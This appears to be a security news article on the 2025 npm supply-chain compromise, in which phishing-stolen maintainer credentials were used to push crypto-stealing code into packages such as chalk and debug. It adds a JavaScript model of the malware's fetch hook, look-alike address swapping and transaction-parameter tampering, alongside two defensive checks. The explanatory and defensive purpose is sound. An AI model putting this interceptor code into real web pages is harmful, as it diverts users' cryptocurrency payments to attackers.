Cybercriminals Compromise 18 Highly Popular npm Packages Totalling 2 Billion Weekly Downloads

In a significant supply chain attack, hackers compromised 18 popular npm packages that collectively account for over two billion downloads per week. The attack began on September 8, 2025, when malicious code aimed at stealing cryptocurrency from end users was published in new versions of the packages. Among them were widely used libraries such as chalk, debug, ansi-styles and supports-color, dependencies that sit deep in the build of countless web applications. The injected code is a browser-side payload: it does nothing of note on a build server, but runs in the browser of anyone visiting a site that shipped a bundle containing one of the poisoned versions. There it acts as an in-browser interceptor, manipulating wallet interactions and rewriting payment destinations so that funds go to attacker-controlled addresses. It hooks core browser functions such as fetch and XMLHttpRequest, as well as the injected provider interfaces of popular crypto wallets across several blockchains, including Ethereum and Solana.

The malware executes a series of steps to achieve its objectives. First, it embeds itself in the page by replacing the functions the page uses for web requests and wallet communication with its own wrappers. It then scans network responses and transaction details for strings matching cryptocurrency wallet address formats across multiple blockchains, including Bitcoin and Litecoin. When it finds a legitimate address, it swaps in a look-alike from a hard-coded list of attacker addresses, choosing the candidate that most closely resembles the original by a string-similarity metric so that a user who only glances at the first and last characters is unlikely to notice. The code also alters transaction parameters after the user has reviewed them but before the wallet signs, so even when the user interface displays the correct recipient, the signed transaction routes funds to the attackers. The maintainer of the compromised packages revealed that they had fallen victim to a phishing email purporting to come from npm support, which tricked them into entering their credentials. Although the maintainer began removing the malicious versions, at least one package, simple-swizzle, remained compromised at the time of the report. Teams that build front-end bundles should check their lockfiles for the affected versions, clear package caches, and rebuild, since a lockfile that pinned an older version will not have pulled the poisoned releases.
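The following is an added example, not code from the compromised packages or from this article's source, that models the two behaviours described above (rewriting addresses in network responses and in transaction parameters, choosing the attacker address closest to the legitimate one by edit distance) together with two defensive checks a web application can run. Edit distance is an assumed similarity metric, since the article does not name one; the address patterns, the sample response, the attacker pool and the `demo*` helpers are all constructed for this demo. The same wrapping pattern applies to `XMLHttpRequest`, which is omitted for brevity.

```javascript
// Added example (not the malware's code). Models the response/transaction
// rewriting described above and a defensive integrity check. Everything
// below the helpers is constructed sample data for an offline demo.

// Levenshtein edit distance, single-row dynamic programming.
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0]; // d(i-1, j-1)
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j]; // d(i-1, j)
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      row[j] = Math.min(above + 1, row[j - 1] + 1, diag + cost);
      diag = above;
    }
  }
  return row[b.length];
}

// Pick the attacker address most similar to the legitimate one, so a user
// who checks only the first/last few characters is less likely to notice.
function pickLookalike(legit, pool) {
  let best = pool[0];
  let bestDist = Infinity;
  for (const candidate of pool) {
    const d = levenshtein(legit, candidate);
    if (d < bestDist) { best = candidate; bestDist = d; }
  }
  return best;
}

// Simplified address patterns (constructed; real-world matching would also
// need per-chain checksum validation to avoid false positives).
const ADDRESS_PATTERNS = {
  ethereum: /\b0x[0-9a-fA-F]{40}\b/g,
  bitcoin: /\b[13][1-9A-HJ-NP-Za-km-z]{25,34}\b/g,
};

// Replace every wallet address found in a response body with a look-alike.
function rewriteAddresses(text, pools) {
  let out = text;
  for (const [chain, pattern] of Object.entries(ADDRESS_PATTERNS)) {
    const pool = pools[chain] || [];
    if (pool.length === 0) continue;
    out = out.replace(pattern, (match) => pickLookalike(match, pool));
  }
  return out;
}

// Hook fetch on the given scope (window in a browser, a plain object here)
// so every response body passes through rewriteAddresses() before the page
// sees it. The page's own code keeps calling what it believes is fetch.
function installInterceptor(scope, pools) {
  const originalFetch = scope.fetch;
  scope.fetch = async function hookedFetch(...args) {
    const res = await originalFetch.apply(this, args);
    const rewritten = rewriteAddresses(await res.text(), pools);
    return {
      status: res.status,
      text: async () => rewritten,
      json: async () => JSON.parse(rewritten),
    };
  };
}

// Wallet-side tampering: the UI already showed the correct recipient, but
// the request handed to the wallet provider is altered before signing.
function rewriteTxParams(method, params, pools) {
  if (method !== "eth_sendTransaction" || !params[0]?.to) return params;
  const tx = { ...params[0], to: pickLookalike(params[0].to, pools.ethereum) };
  return [tx, ...params.slice(1)];
}

// Defensive check 1: is a global still native, or has it been replaced by
// script? Caveat: a hook can also override toString(), so this is a first
// signal, not proof of integrity.
function isNativeFunction(fn) {
  return typeof fn === "function" &&
    /\[native code\]/.test(Function.prototype.toString.call(fn));
}

// Defensive check 2: the recipient the application intends to pay must equal
// the recipient in the parameters it is about to hand to the wallet.
function recipientMatches(intendedTo, params) {
  return String(params[0]?.to).toLowerCase() === intendedTo.toLowerCase();
}

// Constructed sample data: one legitimate address per chain, an attacker
// pool containing one decoy and one near-match per chain.
const LEGIT_ETH = "0x" + "1".repeat(40);
const LEGIT_BTC = "1DemoAddrAbCdEfGhJkMnPqRsTuVwXyZ";
const ATTACKER_POOL = {
  ethereum: ["0x" + "2".repeat(40), "0x" + "1".repeat(36) + "2222"],
  bitcoin: ["3" + "Z".repeat(31), "1DemoAddrAbCdEfGhJkMnPqRsTuVwXyQ"],
};
const SAMPLE_RESPONSE = JSON.stringify({ deposit_address: LEGIT_ETH, btc_address: LEGIT_BTC });

function demoRewrite() {
  return JSON.parse(rewriteAddresses(SAMPLE_RESPONSE, ATTACKER_POOL));
}

async function demoInterceptor() {
  const scope = { fetch: async () => ({ status: 200, text: async () => SAMPLE_RESPONSE }) };
  installInterceptor(scope, ATTACKER_POOL);
  const res = await scope.fetch("https://exchange.example/api/deposit"); // constructed URL
  return res.json();
}

demoInterceptor().then((body) => console.log("intercepted response:", body));
```

Both defensive checks are cheap enough to run at page load and again immediately before a transaction is submitted; the recipient comparison is the more robust of the two because it does not depend on detecting the hook at all, only on comparing what the application meant to send with what it is about to send.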

Categories: Supply Chain Attack, Malicious Code Injection, Phishing Attack 

Tags: Supply Chain Attack, npm Packages, Malicious Code, Cryptocurrency, Browser Interceptor, Phishing Attack, Wallet Addresses, Transaction Hijacking, Network Traffic, Blockchain 
